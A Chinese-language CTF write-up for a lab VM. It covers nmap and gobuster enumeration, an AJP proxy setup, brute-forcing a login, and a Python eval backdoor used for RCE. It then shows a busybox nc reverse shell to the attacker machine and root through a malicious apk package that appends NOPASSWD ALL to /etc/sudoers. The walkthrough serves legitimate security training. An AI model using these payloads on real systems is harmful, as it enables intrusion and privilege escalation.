哈哈,整个活,补些wp
一、信息收集与服务探测
1. 主机发现
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:57:e5:45, IPv4: 192.168.205.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1 00:50:56:c0:00:08 VMware, Inc.
192.168.205.2 00:50:56:fc:94:2f VMware, Inc.
192.168.205.190 08:00:27:b0:70:3d PCS Systemtechnik GmbH
192.168.205.254 00:50:56:fb:d6:c6 VMware, Inc.
4 responded扫描结果显示,IP 地址为 192.168.205.190
2. 端口与服务扫描
确定目标 IP 后,使用 nmap 对其进行全端口扫描,以发现所有开放的 TCP 端口及其上运行的服务。
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ nmap -p- 192.168.205.190
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 09:01 EDT
Nmap scan report for 192.168.205.190
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8010/tcp open xmpp结果显示目标开放了三个端口:
- 22/tcp: SSH 服务,通常用于远程登录。
- 80/tcp: HTTP 服务,即标准 Web 服务。
- 8010/tcp: nmap 初步识别为 xmpp,但需要进一步确认。
二、Web 探索与 AJP 代理
1. 初探 80 端口
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl 192.168.205.190
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
使用 gobuster 进行目录爆破也未发现任何有价值的路径
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ gobuster dir -u http://192.168.205.190 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.205.190
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================
2.8010 端口与 AJP
情况有点不对,看看8010是什么服务
PORT STATE SERVICE VERSION
8010/tcp open xmpp?
| fingerprint-strings:
| GenericLines:
|_ ajpy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8010-TCP:V=7.95%I=7%D=7/16%Time=6877A304%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,8,"\x124\0\x04ajpy");
MAC Address: 08:00:27:B0:70:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
搜索了一下
通过搜索,我们了解到 8010 端口很可能运行着 AJP (Apache JServ Protocol) 服务。
Tip
什么是 AJP?
AJP 是一个二进制协议,设计用于反向代理服务器(如 Apache HTTP Server)与后端的应用服务器(如 Apache Tomcat)之间进行通信。它比 HTTP 更高效,因为它在设计上减少了网络开销。我们不能像访问普通网页一样直接通过浏览器访问 AJP 服务。
为了与 AJP 服务交互,我们需要设置一个本地代理。这里我们使用 Apache httpd 服务器的 mod_proxy_ajp 模块,将我们本地的 8000 端口收到的 HTTP 请求转发到目标的 8010 端口。
代理配置步骤:
-
启用 Apache 的相关代理模块:
sudo apt-get install apache2 sudo a2enmod proxy sudo a2enmod proxy_http sudo a2enmod proxy_ajp
-
创建一个新的 Apache 站点配置文件
/etc/apache2/sites-available/ajp-proxy.conf:Listen 8000 <VirtualHost *:8000> ProxyPass / ajp://192.168.205.190:8010/ ProxyPassReverse / ajp://192.168.205.190:8010/ </VirtualHost>
-
启用该站点并重启 Apache 服务:
sudo a2ensite ajp-proxy.conf sudo systemctl restart apache2
配置完成后,访问我们自己机器的 http://127.0.0.1:8000 (或 http://192.168.205.128:8000) 就相当于在访问目标 192.168.205.190:8010 上的 Web 应用了。
三、漏洞利用与初始访问
代理设置成功后,我们再次对代理后的地址进行目录爆破。
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ gobuster dir -u http://192.168.205.128:8000 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,zip -t 64
===============================================================
/login (Status: 200) [Size: 21]
/test (Status: 200) [Size: 12]
/backdoor (Status: 200) [Size: 9]
=============================================================== 这次我们发现了三个路径:/login, /test, /backdoor。
1. 登录页面爆破
经过测试发现,/login 路径接受一个 password 参数,并提示密码长度为 5。
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl 'http://192.168.205.128:8000/login?password=test'
Password length is 5这暗示我们需要爆破一个长度为 5 的密码。然而,直接使用常规字典爆破会遇到问题,因为后端对特殊字符的长度计算方式可能与我们预想的不同。正确的做法是对字典中的每一个密码进行 URL 编码。
-
从
rockyou.txt中筛选出所有长度为 5 的密码:grep -x '^.\{5\}$' /usr/share/wordlists/rockyou.txt > 5z.txt
-
使用 Python 对筛选后的字典进行 URL 编码:
python3 -c 'import sys, urllib.parse; [print(urllib.parse.quote(line.strip())) for line in sys.stdin]' < 5z.txt > 5z_u.txt
-
使用
ffuf和编码后的字典进行爆破,并过滤掉返回内容为空的响应 (--fs 0):┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp] └─$ ffuf -u "http://192.168.205.128:8000/login?password=FUZZ" -w 5z_u.txt --fs 0 ... %21%40%23%24%25 [Status: 200, Size: 25, Words: 1, Lines: 1, Duration: 2ms] ...
我们找到了一个有效的密码 %21%40%23%24%25,它解码后是 !@#$%。
2. 后门与远程代码执行(RCE)
用找到的密码访问登录页面,返回了一个新的路径:
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl 'http://192.168.205.128:8000/login?password=%21%40%23%24%25'
/backdoooooooooooooooooor访问这个 /backdoooooooooooooooooor 路径,并尝试传入 cmd 参数执行命令。
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl 'http://192.168.205.128:8000/backdoooooooooooooooooor?cmd=id'
<built-in function id>返回结果 <built-in function id> 表明后端很可能使用了 Python 的 eval() 或类似函数来执行代码,并且没有导入 os 模块。为了执行系统命令,我们需要先导入 os 模块。
┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl 'http://192.168.205.128:8000/backdoooooooooooooooooor?cmd=__import__("os").popen("whoami").read()'
welcome成功执行命令!我们当前的用户是 welcome。
3. 反弹 Shell
为了获得一个更稳定的交互式 Shell,我们利用这个 RCE 漏洞反弹一个 Shell 到我们的攻击机上。目标系统上存在 busybox,它集成了 nc (netcat) 工具。
- 在攻击机(Kali)上监听 8888 端口:
nc -lvnp 8888- 通过 URL 发送反弹 Shell 的 payload(注意
+在 URL 中会被视为空格,这里是busybox多功能二进制文件的用法):
curl 'http://192.168.205.128:8000/backdoooooooooooooooooor?cmd=__import__("os").popen("busybox+nc+192.168.205.128+8888+-e+/bin/bash").read()'攻击机成功接收到连接,我们获得了 welcome 用户的 Shell。
4. 稳定 Shell 并获取用户 Flag
为了更好的交互体验,我们将这个简陋的 Shell 升级为功能齐全的 TTY。
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80在 welcome 用户的家目录下,我们找到了第一个 flag。
localhost:~$ ls -al
...
-rw-r--r-- 1 root welcome 39 Jul 14 15:11 user.txt
localhost:~$ cat user.txt
flag{5a80870310e5a3bc10c00ef6d20a3cac}四、权限提升
我们的目标是 root 权限,因此需要进行提权。
1. 提权至 superuser
在枚举系统时,发现一个只监听在本地 127.0.0.1:5000 的可疑服务。
localhost:~$ netstat -lntup
...
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
...
localhost:~$ busybox nc 127.0.0.1 5000
Welcome to SignatureChain CTF over TCP!
Type 'view', 'submit', 'hint', or 'exit'
> view
[
{
"index": 1,
"sender": "system",
"recipient": "alice",
"amount": 100,
"signature": "14ed219616014b683ae66d1ec2e098c84ff09695b33fff0a7652505e260be0aa",
"note": "1"
},
{
"index": 2,
"sender": "alice",
"recipient": "bob",
"amount": 50,
"signature": "08188ce485e280ba7d8c614a776a478d75ac2e985a535d1d126117ceb59ac952",
"note": "2"
}
]
> hint
[Hint 1] Use 'view' to inspect part of the blockchain.
[Hint 2] The signature is just sha256(sender->recipient:amount).
[Hint 3] Try forging a valid signature with this knowledge.
[Hint 4] What if admin sent you 999 coins?- 使用
view查看区块链的一部分。 - 签名就是
sha256(sender->recipient:amount)。 - 试着用这些知识伪造一个有效的签名。
- 如果管理员给你发送了 999 枚硬币呢?
连接该服务后,发现是一个基于区块链签名的 CTF 挑战。
get不到,扒拉一下其他地方
localhost:~$ cd /opt/
localhost:/opt$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 13 14:43 .
drwxr-xr-x 21 root root 4096 Jul 13 18:06 ..
drwx--x--x 4 root root 4096 Jul 9 16:53 containerd
drwxr-xr-x 2 root root 4096 Jul 14 15:13 server
localhost:/opt$ cd server/
localhost:/opt/server$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Jul 14 15:13 .
drwxr-xr-x 4 root root 4096 Jul 13 14:43 ..
-rw-r--r-- 1 root root 98 Jul 13 16:27 Dockerfile
-rw-r--r-- 1 root root 3667 Jul 13 16:21 server.py
localhost:/opt/server$ cat server.py
import socket
import threading
import json
import hashlib
FLAG = "flag{superuser/f124cf868d5e3fa5a7de39f80a2f9a0e}"
# ... 此处省略大量代码 ...有捷径,哈哈哈
代码中硬编码了一个 flag:flag{superuser/f124cf868d5e3fa5a7de39f80a2f9a0e}。根据 flag 的格式,我们可以推断出存在一个名为 superuser 的用户,其密码可能是 f124cf868d5e3fa5a7de39f80a2f9a0e。
使用此凭据切换用户成功。
localhost:/opt/server$ cd /home/
localhost:/home$ su superuser
Password:
/home $ id
uid=1001(superuser) gid=1001(superuser) groups=300(abuild),1001(superuser)2. 提权至 root
成为 superuser 后,检查 sudo 权限。
/home $ sudo -l
User superuser may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/apk这是一个关键突破口!我们可以无需密码以 root 权限运行 apk 命令。apk 是 Alpine Linux 的包管理器。我们可以创建一个包含恶意安装后脚本的自定义 .apk 包,然后用 sudo apk 来安装它。该脚本将以 root 权限执行。
提权步骤:
- 创建恶意包工作目录和文件
APKBUILD:定义包名、版本等元信息。pwn.post-install:安装后要执行的脚本。我们可以在这里写入提权命令。
# 创建工作目录
mkdir /tmp/malicious-pkg
cd /tmp/malicious-pkg
cat << 'EOF' > APKBUILD
pkgname=pwn
pkgver=1.0.0
pkgrel=0
pkgdesc="pwn"
arch="noarch"
license="GPL"
install="pwn.post-install"
package() {
mkdir -p "$pkgdir"
}
EOF
# 写入恶意安装后脚本 (例如:给予 superuser 完全的 sudo 权限)
cat << 'EOF' > pwn.post-install
#!/bin/bash
echo 'superuser ALL=(ALL:ALL) NOPASSWD: ALL' >> /etc/sudoers
EOF- 生成签名密钥并构建包
abuild工具需要签名密钥来构建包。
# 生成密钥对
abuild-keygen -a
# 构建包
abuild checksum
abuild -r- 安装恶意包并提权
使用sudo apk add并加上--allow-untrusted选项来安装我们自己构建的未签名包。
sudo apk add --allow-untrusted /home/superuser/packages/tmp/x86_64/pwn-1.0.0-r0.apk 安装过程中,pwn.post-install 脚本会被 root 执行,superuser 用户现在拥有了无密码执行任何 sudo 命令的权限。
localhost:/tmp/malicious-pkg$ sudo -l
User superuser may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/apk
(ALL : ALL) NOPASSWD: ALL-
获取 Root Shell
localhost:/tmp/malicious-pkg$ sudo su /tmp/malicious-pkg # id uid=0(root) gid=0(root) groups=0(root),...
最后,在 root 的家目录下找到最终的 flag。
/tmp/malicious-pkg # cat /root/root.txt
flag{bd941f8fb8a7b5b1c34bd71a349d6d04}